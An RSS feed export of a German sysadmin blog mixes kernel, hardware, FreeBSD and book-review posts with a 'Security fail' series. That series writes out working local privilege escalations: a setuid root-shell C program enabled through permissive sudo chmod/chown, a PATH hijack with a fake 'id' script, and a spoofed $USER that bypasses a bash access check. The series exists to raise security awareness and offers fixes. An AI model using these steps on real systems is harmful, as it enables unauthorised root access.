<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>adminlife.net</title>
	
	<link>http://www.adminlife.net</link>
	<description>... aus dem Alltag eines Sysadmins</description>
	<lastBuildDate>Tue, 27 Sep 2011 14:43:32 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/adminlife" /><feedburner:info uri="adminlife" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><creativeCommons:license>http://creativecommons.org/licenses/by/2.0/</creativeCommons:license><item>
		<title>Neuer Blog</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/vFXR-oTmRI8/</link>
		<comments>http://www.adminlife.net/allgemein/neuer-blog/#comments</comments>
		<pubDate>Sun, 01 May 2011 23:43:53 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[adminlife]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2307</guid>
		<description><![CDATA[Nachdem es um das Adminlife.net Projekt stiller geworden ist, und ich gerne an der Struktur der Seite usw. einiges ändern wollte, jedoch auf Matthias Webserver keinen root-Zugriff habe, haben wir uns drauf verständig, dass ich einen eigenen Blog eröffnen werde. Der alte Blog bleibt in seiner jetzigen Form erhalten, wird von uns jedoch nicht weiter [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Nachdem es um das <A HREF="www.adminlife.net">Adminlife.net</A> Projekt stiller geworden ist, und ich gerne an der Struktur der Seite usw. einiges ändern wollte, jedoch auf Matthias Webserver keinen root-Zugriff habe, haben wir uns drauf verständig, dass ich einen eigenen Blog eröffnen werde. Der alte Blog bleibt in seiner jetzigen Form erhalten, wird von uns jedoch nicht weiter geführt.</p>
<p align="justify">
Diejenigen, die den Blog über Feedreader abonniert hatten: hier kommt nichts mehr, weiter gehts auf <A href="http://www.admlife.de">ADMinLIFE</A>. Also los: Reader umstellen! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/vFXR-oTmRI8" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/neuer-blog/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/allgemein/neuer-blog/</feedburner:origLink></item>
		<item>
		<title>Kernel 2.6.37: Qualcomm (qcserial.c) für gobi 2000 geändert</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/LHCRfpODfhQ/</link>
		<comments>http://www.adminlife.net/news/kernel-2-6-37-qualcomm-qcserial-c-fuer-gobi-2000geaendert/#comments</comments>
		<pubDate>Tue, 11 Jan 2011 00:29:00 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[adminlife]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[reviews]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[git bisect]]></category>
		<category><![CDATA[gobi 2000]]></category>
		<category><![CDATA[gobi2000]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[qcserial]]></category>
		<category><![CDATA[qcserial.c]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2289</guid>
		<description><![CDATA[Seltsamerweise funktionierte die Gobi 2000 Karte meins x201 mit 2.6.36 noch, 2.6.37 nicht mehr. Nach einigem git bisect&#8217;en ergab sich vorhin: Bisecting: 0 revisions left to test after this (roughly 0 steps) [1992de83e375acc789daf66b7b72a812a5235b75] USB: qcserial: Enable Diagnostics Monitor and GPS ports on Gobi 2000 Nun muss /dev/ttyUSB1 statt wie bisher /dev/ttyUSB0 genutzt werden. Aber wer [...]]]></description>
			<content:encoded><![CDATA[<p>Seltsamerweise funktionierte die Gobi 2000 Karte meins x201 mit 2.6.36 noch, 2.6.37 nicht mehr.</p>
<p>Nach einigem git bisect&#8217;en ergab sich vorhin:</p>
<pre><strong>Bisecting: 0 revisions left to test after this (roughly 0 steps)

[1992de83e375acc789daf66b7b72a812a5235b75] USB: qcserial: Enable Diagnostics Monitor and GPS ports on Gobi 2000</strong></pre>
<p>
Nun muss /dev/ttyUSB1 statt wie bisher /dev/ttyUSB0 genutzt werden. Aber wer liest schon dauernd die LKML oder guckt sich alle Changes vor einem Kernel-Update an? <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> <!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/LHCRfpODfhQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/news/kernel-2-6-37-qualcomm-qcserial-c-fuer-gobi-2000geaendert/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/news/kernel-2-6-37-qualcomm-qcserial-c-fuer-gobi-2000geaendert/</feedburner:origLink></item>
		<item>
		<title>Warnung: hohe Ausfallquote bei WD SATA Raid Edition</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/tb6y5dsG4ms/</link>
		<comments>http://www.adminlife.net/allgemein/warnung-wd-sata-raid-edition-ausfallquote/#comments</comments>
		<pubDate>Thu, 20 May 2010 22:36:12 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[defekt]]></category>
		<category><![CDATA[Festplatten]]></category>
		<category><![CDATA[RAID Edition]]></category>
		<category><![CDATA[WD]]></category>
		<category><![CDATA[WD2502ABYS]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2262</guid>
		<description><![CDATA[Achtung: die Western Digital 250 GB Raid Edition Festplatten haben bei mir im Rechenzentrum derzeit eine gefühlte Ausfallquote von 10%. Angeblich ist eine bestimmte Charge von den Ausfällen betroffen, offizielle Angaben gibt es derzeit soweit ich weiß (noch?) nicht. Unser Lieferant erledigt Garantiefälle für uns recht unbürokratisch &#8211; wir schicken nie direkt zu WD, weil [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" src="http://data68.sevenload.com/slcom/tm/qj/edehfc/obznkkinkee.jpg~/Western-Digital-RAID-Edition-WD2500SB.jpg" alt="" width="180" height="180" /></p>
<p><strong>Achtung</strong>: die Western Digital 250 GB Raid Edition Festplatten haben bei mir im Rechenzentrum derzeit eine gefühlte Ausfallquote von 10%. Angeblich ist eine bestimmte Charge von den Ausfällen betroffen, offizielle Angaben gibt es derzeit soweit ich weiß (noch?) nicht.</p>
<p>Unser Lieferant erledigt Garantiefälle für uns recht unbürokratisch &#8211; wir schicken nie direkt zu WD, weil wir teils Platten im Vorabaustausch bekommen. Er hat jedenfalls eine größere Menge defekte Festplatten weitergeleitet und nun haben wir für einige Platten als Ersatz 500 GB Modelle bekommen &#8211; für lau. Man munkelt, dass aufgrund der extrem hohen Rücklaufzahlen der Bedarf an 250ern derzeit nicht gedeckt werden kann.</p>
<p>Es bleibt spannened. Sobald ich etwas genaueres weiß, werde ich hier was schreiben.</p>
<p><strong>Edit:</strong> Falls bei euch in letzter Zeit auch viel ausgefallen ist, schreibt bitte das Alter der Festplatten dazu!<!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/tb6y5dsG4ms" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/warnung-wd-sata-raid-edition-ausfallquote/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/allgemein/warnung-wd-sata-raid-edition-ausfallquote/</feedburner:origLink></item>
		<item>
		<title>Security fail pt4: Backups</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/HvExKF4XN-g/</link>
		<comments>http://www.adminlife.net/hacks/security-fail-pt4-backups/#comments</comments>
		<pubDate>Wed, 28 Apr 2010 17:10:56 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[adminlife]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[Fail]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacked]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2213</guid>
		<description><![CDATA[Auch immer wieder gesehen: falsche Berechtigungen von Backups. [user@srv2342 ~]$ ls -l /opt/backup -rw-r--r-- 1 root root 2,6M 09. Apr 20:30 etc-20100409.tgz -rw-r--r-- 1 root root 2,6M 10. Apr 20:30 etc-20100410.tgz -rw-r--r-- 1 root root 2,6M 11. Apr 20:30 etc-20100411.tgz -rw-r--r-- 1 root root 2,6M 12. Apr 20:30 etc-20100412.tgz Natürlich war auch die /etc/shadow enthalten&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" src="http://blurredproductions.files.wordpress.com/2009/03/sisko-facepalm.jpg" alt="Facepalm" width="236" height="191" />Auch immer wieder gesehen: falsche Berechtigungen von Backups.</p>
<p><code><br />
[user@srv2342 ~]$ ls -l /opt/backup<br />
-rw-r--r-- 1 root root 2,6M 09. Apr 20:30 etc-20100409.tgz<br />
-rw-r--r-- 1 root root 2,6M 10. Apr 20:30 etc-20100410.tgz<br />
-rw-r--r-- 1 root root 2,6M 11. Apr 20:30 etc-20100411.tgz<br />
-rw-r--r-- 1 root root 2,6M 12. Apr 20:30 etc-20100412.tgz<br />
</code></p>
<p>Natürlich war auch die /etc/shadow enthalten&#8230; john macht damit bekanntlich meist kurzen Prozess.</p>
<p>Beliebt sind scheinbar auch Scripte, die etwas der folgenden Art machen, um Backups zu erstellen und die Rechte korrekt zu setzen:<br />
<code><br />
tar -czf  /opt/backup/etc-backup.tgz /etc<br />
chmod 600 /opt/backup/etc-backup.tgz<br />
</code><br />
Hier entsteht eine klassische Race-Condition. Falls der Angreifer die Platten verlangsamt (z.B. per dd) und/oder eine while true Schleife nutzt, die er kurz vor Backupbeginn startet, kann er evtl. Teile oder das gesamte Backup kopieren.</p>
<p>Besser: Global umask 0027 setzen. Falls nicht möglich (z.B. Firmen-Policy), einfach vor dem Aufruf von tar ausführen:<br />
<code><br />
umask 0027<br />
tar -czf  /opt/backup/etc-backup.tgz /etc<br />
</code></p>
<p>Backups müssen genauso wie die Originaldaten behandelt werden und gehören nicht nach /tmp oder mit unsicheren Dateirechten sonstwohin.<!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/HvExKF4XN-g" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/hacks/security-fail-pt4-backups/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/hacks/security-fail-pt4-backups/</feedburner:origLink></item>
		<item>
		<title>Security fail pt3: Userauthentifizierung über externe Kommandos</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/_PHGJf2qvpU/</link>
		<comments>http://www.adminlife.net/hacks/security-fail-pt3-userauthentifizierung-ueber-externe-kommandos/#comments</comments>
		<pubDate>Wed, 14 Apr 2010 16:47:09 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[hacks]]></category>
		<category><![CDATA[howtos]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[wissen]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[Fail]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2229</guid>
		<description><![CDATA[Tim schlug hier vor, im Vorpost etwas anderes zur Authentifizierung als $USER zu nutzen: id. Auch das ist unsicher, wenn man es falsch macht. Ich benutze hier einfach mal die UIDs statt der Usernamen. Der folgende Code wäre dann die id-Variante, wer findet das Sicherheitsproblem? #!/bin/bash if [ "$(id -u)" != "1001" ] &#38;&#38; [ [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" src="http://www.poormojo.org/pmjadaily/archives/Blank-Facepalm.gif" alt="" width="168" height="125" /></p>
<p>Tim schlug <a href="http://www.adminlife.net/allgemein/security-fail-pt2-userauthentifizierung-in-bash/#comment">hier</a> vor, im Vorpost etwas anderes zur Authentifizierung als $USER zu nutzen: id. Auch das ist unsicher, wenn man es falsch macht. Ich benutze hier einfach mal die UIDs statt der Usernamen. Der folgende Code wäre dann die id-Variante, wer findet das Sicherheitsproblem? <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /><br />
<BR><BR></p>
<p><code><br />
#!/bin/bash<br />
if [ "$(id -u)" != "1001" ] &amp;&amp; [ "$(id -u)" != "1002" ]<br />
then<br />
echo "Zugriff verweigert."<br />
else<br />
echo OK<br />
[...]<br />
echo "$(date) Domain $1 gelöscht durch $USER" &gt;&gt; /var/log/domainlog<br />
fi<br />
</code></p>
<p>Umgehen kann man es jedoch wieder trivial, man erstelle ~/id:<br />
<code><br />
[stefan@srv2342 ~]$ sh authme.sh<br />
Zugriff verweigert.<br />
[stefan@srv2342 ~]$ echo "echo 1001" &gt; ~/id<br />
[stefan@srv2342 ~]$ chmod +x ~/id<br />
[stefan@srv2342 ~]$ PATH=".:$PATH" sh authme.sh<br />
OK<br />
[stefan@srv2342 ~]$<br />
</code></p>
<p>Wir haben hier PATH so geändert, dass zuerst im aktuellen Pfad nach id Datei gesucht wird &#8211; die Datei haben wir grade angelegt und sie gibt aus, was das Script als Antwort sehen möchte. Whoops! ;D<!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/_PHGJf2qvpU" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/hacks/security-fail-pt3-userauthentifizierung-ueber-externe-kommandos/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/hacks/security-fail-pt3-userauthentifizierung-ueber-externe-kommandos/</feedburner:origLink></item>
		<item>
		<title>Security fail pt2: Userauthentifizierung in BASH</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/XSO0YbDDcl4/</link>
		<comments>http://www.adminlife.net/allgemein/security-fail-pt2-userauthentifizierung-in-bash/#comments</comments>
		<pubDate>Tue, 13 Apr 2010 20:16:58 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[howtos]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[wissen]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[Fail]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacker]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2208</guid>
		<description><![CDATA[Um die Security awareness etwas zu erhöhen, habe ich überlegt, noch ein paar witzige Schnippsel zu posten! Vielleicht entdeckt ja jemand auch etwas, das er selbst mal gemacht hat! Hier folgt nun ein sinngemäßer Auszug aus einem Script, das bei einem ISP sehr kritische Aktionen für Domains ausführt: #!/bin/bash if [ "$USER" != "franz" ] [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" src="http://www.justpressplay.net/images/stories/facepalm.jpg" alt="" width="229" height="172" /></p>
<p>Um die Security awareness etwas zu erhöhen, habe ich überlegt, noch ein paar witzige Schnippsel zu posten! Vielleicht entdeckt ja jemand auch etwas, das er selbst mal gemacht hat! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Hier folgt nun ein sinngemäßer Auszug aus einem Script, das bei einem ISP sehr kritische Aktionen für Domains ausführt:<br />
<BR><BR><br />
<code><br />
#!/bin/bash<br />
if [ "$USER" != "franz" ] &amp;&amp; [ "$USER" != "karl" ]<br />
then<br />
echo "Zugriff verweigert."<br />
else<br />
[...]<br />
echo "$(date) Domain $1 gelöscht durch $USER" &gt;&gt; /var/log/domainlog<br />
fi<br />
</code></p>
<p>Wichtig ist hier vor allem das Audit Log. Umgehen kann man es jedoch trivial:<br />
<code><br />
USER=franz ./domain-delete.sh [domain]<br />
</code></p>
<p>Leider bedachte der Programmierer nicht, dass $USER natürlich trivial von jedem Shelluser geändert werden kann. Das Audit-Log würde ggfs. sehr unerfreuliche Folgen haben.</p>
<p>Bessere Lösung: sudo benutzen und nur den zwei Usern, die es wirklich benötigen, Rechte auf das Script gewähren.<!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/XSO0YbDDcl4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/security-fail-pt2-userauthentifizierung-in-bash/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/allgemein/security-fail-pt2-userauthentifizierung-in-bash/</feedburner:origLink></item>
		<item>
		<title>Security fail pt1: sudo chmod/chown</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/B532ioaLdwQ/</link>
		<comments>http://www.adminlife.net/allgemein/sudo-chmodchown-fail/#comments</comments>
		<pubDate>Thu, 08 Apr 2010 23:06:16 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[wissen]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[chmod]]></category>
		<category><![CDATA[chown]]></category>
		<category><![CDATA[Fail]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[sudo]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2191</guid>
		<description><![CDATA[Auf einem Webserver fand ich kürzlich eine sudoers-Zeile, die einem User erlaubte, chmod und chown für ein bestimmtes Verzeichnis (/foo) auszuführen. Sowas sollte man tunlichst vermeiden. user@srv2342: ~&#62; id uid=1007(user) gid=100(users) groups=16(dialout),33(video),100(users) Ich brauche zuerst ein kleines C-Tool: user@srv2342: ~&#62; cat &#62; /foo/y.c #include int main() { setuid(0); setgid(0); system("/bin/bash"); } STRG-D Compilieren: user@srv2342:/foo&#62; cd [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" src="http://thegamereviews.com/images/uploads/20080918_Picard_Facepalm.jpg" alt="Facepalm" width="233" height="151" /></p>
<p>Auf einem Webserver fand ich kürzlich eine <em>sudoers</em>-Zeile, die einem User erlaubte, chmod und chown für ein bestimmtes Verzeichnis (/foo) auszuführen. Sowas sollte man tunlichst vermeiden.<br />
<code><br />
user@srv2342: ~&gt; id<br />
uid=1007(user) gid=100(users) groups=16(dialout),33(video),100(users)<br />
</code><br />
<BR><br />
Ich brauche zuerst ein kleines C-Tool:<br />
<code><br />
user@srv2342: ~&gt; cat &gt; /foo/y.c<br />
#include<br />
int main()<br />
{<br />
setuid(0);<br />
setgid(0);<br />
system("/bin/bash");<br />
}<br />
STRG-D<br />
</code></p>
<p>Compilieren:<br />
<code><br />
user@srv2342:/foo&gt; cd /foo; gcc y.c -o y<br />
</code></p>
<p>Jetzt machen wir sudo-magic und erhalten ein SetUID-Bit:</p>
<p><code>user@srv2342:/foo&gt; sudo /bin/chown 0:0 /foo/y<br />
user@srv2342:/foo&gt; sudo /bin/chmod 4775 /foo/y<br />
user@srv2342:/foo ls -l<br />
total 16<br />
-rwsrwxr-x 1 root        root         9217 Mar 26 14:52 y<br />
-rw-r----- 1 user        users         101 Mar 26 14:51 y.c<br />
</code></p>
<p>Root werden:<br />
<code><br />
user@srv2342:/foo&gt; ./y<br />
srv2342:/foo # id<br />
uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)</code></p>
<p>Owned! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> <!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/B532ioaLdwQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/sudo-chmodchown-fail/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/allgemein/sudo-chmodchown-fail/</feedburner:origLink></item>
		<item>
		<title>FreeBSD: Ethernet Point-to-Point Verbindung</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/7DbrNriqkz0/</link>
		<comments>http://www.adminlife.net/allgemein/freebsd-ethernet-point-to-point-verbindung/#comments</comments>
		<pubDate>Fri, 29 Jan 2010 14:05:32 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[howtos]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[bsd]]></category>
		<category><![CDATA[freebsd]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[netzwerk]]></category>
		<category><![CDATA[point-to-point]]></category>
		<category><![CDATA[pointopoint]]></category>
		<category><![CDATA[ptp]]></category>
		<category><![CDATA[routing]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2174</guid>
		<description><![CDATA[Hier eine Kurzanleitung für all diejenigen, die ein FreeBSD unter kvm mit Point-to-Point benutzen wollen und daran verzweifelt sind, ins Netz zu kommen (dies ist ein kleiner Reminder für mich selbst *g): Lokal ist hier die IP 192.168.0.220, Remote ist 192.168.0.210. /etc/rc.conf: ifconfig_em0="inet 192.168.0.220 192.168.0.210" static_routes="default" route_default="-net 0.0.0.0 -iface -interface em0" Ist auf der anderen [...]]]></description>
			<content:encoded><![CDATA[<p>Hier eine Kurzanleitung für all diejenigen, die ein FreeBSD unter kvm mit Point-to-Point benutzen wollen und daran verzweifelt sind, ins Netz zu kommen (dies ist ein kleiner Reminder für mich selbst *g):</p>
<p>Lokal ist hier die IP 192.168.0.220, Remote ist 192.168.0.210.</p>
<p>/etc/rc.conf:</p>
<p style="padding-left: 30px"><code>ifconfig_em0="inet 192.168.0.220 192.168.0.210"<br />
static_routes="default"<br />
route_default="-net 0.0.0.0 -iface -interface em0"</code></p>
<p style="padding-left: 30px">
<p>Ist auf der anderen Seite Linux im Einsatz, so macht man dort:</p>
<p style="padding-left: 30px">
<code>ip addr add 192.168.0.210 peer 192.168.0.220/32 dev tunX</code></p>
<p>Natürlich erst, nachdem das neue tun-Interface oben ist (also z.B. im eigenen up-Script). <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> <!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/7DbrNriqkz0" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/freebsd-ethernet-point-to-point-verbindung/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/allgemein/freebsd-ethernet-point-to-point-verbindung/</feedburner:origLink></item>
		<item>
		<title>Review: Praxisbuch Nagios</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/lTkFw5TjLXQ/</link>
		<comments>http://www.adminlife.net/buecher/praxisbuch-nagios/#comments</comments>
		<pubDate>Thu, 17 Dec 2009 01:50:50 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[bücher]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1682</guid>
		<description><![CDATA[Vor einiger Zeit kam das im Juni erschienene Praxisbuch Nagios bei mir an &#8211; Aufgrund von Prüfungen, Arbeitsstress etc. bin ich allerdings leider erst kürzlich dazu gekommen, es intensiver zu betrachten; das Schreiben dieses Reviews hat sich dann ebenfalls etwas hingezogen&#8230; Eins vorweg: das Buch ist sowohl für den Einsteiger, als auch für den fortgeschritteneren [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.adminlife.net/wp-content/uploads/2009/12/praxisbuch_nagios.png" alt="praxisbuch_nagios" width="133" height="173" class="alignleft size-full wp-image-2171" />
<p align="justify">Vor einiger Zeit kam das im Juni erschienene <a href="http://www.amazon.de/gp/product/3897218801?ie=UTF8&amp;tag=adaudeleeisy-21&amp;linkCode=as2&amp;camp=1638&amp;creative=19454&amp;creativeASIN=3937514651">Praxisbuch Nagios</a> bei mir an &#8211; Aufgrund von Prüfungen, Arbeitsstress etc. bin ich allerdings leider erst kürzlich dazu gekommen, es intensiver zu betrachten; das Schreiben dieses Reviews hat sich dann ebenfalls etwas hingezogen&#8230;</p>
<p align="justify">Eins vorweg: das Buch ist sowohl für den Einsteiger, als auch für den fortgeschritteneren Admin als Nachschlagewerk oder Inspiration brauchbar, denn es wird auch auf fortgeschrittenere Themen wie z.B. Visualisierung und Pluginprogrammierung eingegangen.</p>
<p align="justify">Ausführlich erläutert das Buch anfangs, was mit Nagios möglich ist, was es mit Scheduling, Plugins, Benachrichtigungen, CGIs fürs Webinterface, Zeitperioden, Check-Kommandos, Templates usw. auf sich hat &#8211; jeweils ausführlich anhand von Beispielen. Dank der mitgelieferten Live-CD kann man bei Interesse auch zu haus sehr schnell selbst loslegen, ohne ein gesamtes Nagios installieren und konfigurieren zu müssen.<span id="more-1682"></span>Im 2. Teil des Buches wird anhand eines beispielhaften Unternehmens ausführlich beschrieben, wie eine initiale Nagios-Installation einzurichten ist &#8211; der gesamte Prozess von der Ist-Aufnahme bis zu Alarmierungsmöglichckeiten im Fehlerfalle. So lernt man z.B. welche Checks wofür Sinn machen, wie sinnvoll mit Templates gearbeitet werden kann und wie genau das Ganze dann in der Praxis umgesetzt wird. In späteren Kapiteln werden auch <a href="ios-wiki.de/nagios/howtos/nrpe">NRPE</a> (Nagios Remote Plugin Executor), <a href="http://nsclient.org/nscp/">NSCP</a> (NagiosClient++ für Windows) und <a href="http://www.nagios-wiki.de/nagios/plugins/check_by_ssh">check_by_ssh</a> erläutert, die wichtig sind, um beispielsweise auf entfernten Servern Festplattenkapazitäten zu überprüfen, weiterhin wird auch auf passive Überwachung per <a href="http://www.nagios-wiki.de/nagios/howtos/nsca_server">NSCA</a> (Nagios Service Check Acceptor) eingegangen &#8211; dadurch kann z.B. eine Firewall von sich aus Meldungen per SNMP Trap an Nagios übermitteln, sodass kein ständiges Polling stattfinden muss. Wie immer, wird alles &#8211; auch das ggfs. notwendige Compilieren &#8211; ausführlich beschrieben, sodass man nicht Anweisungen wie &#8220;Installieren Sie nun snmptt.&#8221; allein gelassen wird.</p>
<p align="justify">Im 3. Teil wird letztendlich auf graphische Auswertungsmethoden eingegangen, um die man als Administrator über kurz oder lang nicht herumkommt &#8211; vor allem, wenn <a href="http://de.wikipedia.org/wiki/ITIL">ITIL</a> vor der Tür steht. Hier wird im Detail auf <a href="http://docs.pnp4nagios.org/de/pnp-0.4/start">PNP</a> und <a href="http://www.nagvis.org/">NagVis</a> eingegangen, auch einige Tuning-Hinweise fehlen nicht.</p>
<p align="justify">Zuletzt gibt es noch ein meiner Ansicht nach sehr sinnvolles Kapitel über Plugin-Programmierung incl. Quellcodes &#8211; irgendwann kommt man nämlich an die Stelle, an der man für einen bestimmten Service oder eine bestimmte Anwendung &#8211; etwa für ein proprietäres Tool zur Raidcontrollerüberprüfung &#8211; kein passendes Plugin findet. Eine Übersicht der Konfigurationsoptionen der Nagios-Dateien mit jeweiliger Erläuterung findet sich im Anhang &#8211; als Nachschlagewerk praktisch.</p>
<p align="justify">Als Admin, der bereits Berührungspunkte mit Nagios hatte, wird man einige Teile zwar überblättern, spätestens aber bei der Pluginprogrammierung und Visualisierung innehalten &#8211; auch die über das gesamte Buch hinweg eingestreuten nützlichen &#8220;kleine Tipps&#8221; wie z.B. den Hinweis auf NagiosChecker für Firefox (den ich selbst seit längerer Zeit benutze) erweitern das Wissen über das Nagios-Universium.</p>
<p align="justify">Meine einzige Kritik ist, dass im Kapitel zu NRPE unerwähnt bleibt, dass solche Checks auch z.B. über ein bereits installiertes net-snmp per exec ausgeführt werden könnten &#8211; dies ist jedoch zugegebenermaßen weitaus weniger flexibel und erfordert ggfs. eine Softwaredeploymentlösung, möchte man auf einem konsistenten Stand bleiben.</p>
<p align="justify">Ich kann das Buch für Einsteiger und weniger erfahrene Nagios-Admins nur ausdrücklich empfehlen, selbst als erfahrener Nagios-Hase kann man aber evtl. noch ein paar interessante Sachen erfahren; der weit fortgeschrittene Admin mit &gt;2000 Checks in seinem Nagios wird sich zwar einen Großteil des Buches bereits selbst erarbeitet haben, könnte aber ggfs. trotzdem noch z.B. beim Templating, der Pluginprogrammierung oder Visualisierung etwas dazulernen.</p>
<p><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/lTkFw5TjLXQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/buecher/praxisbuch-nagios/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
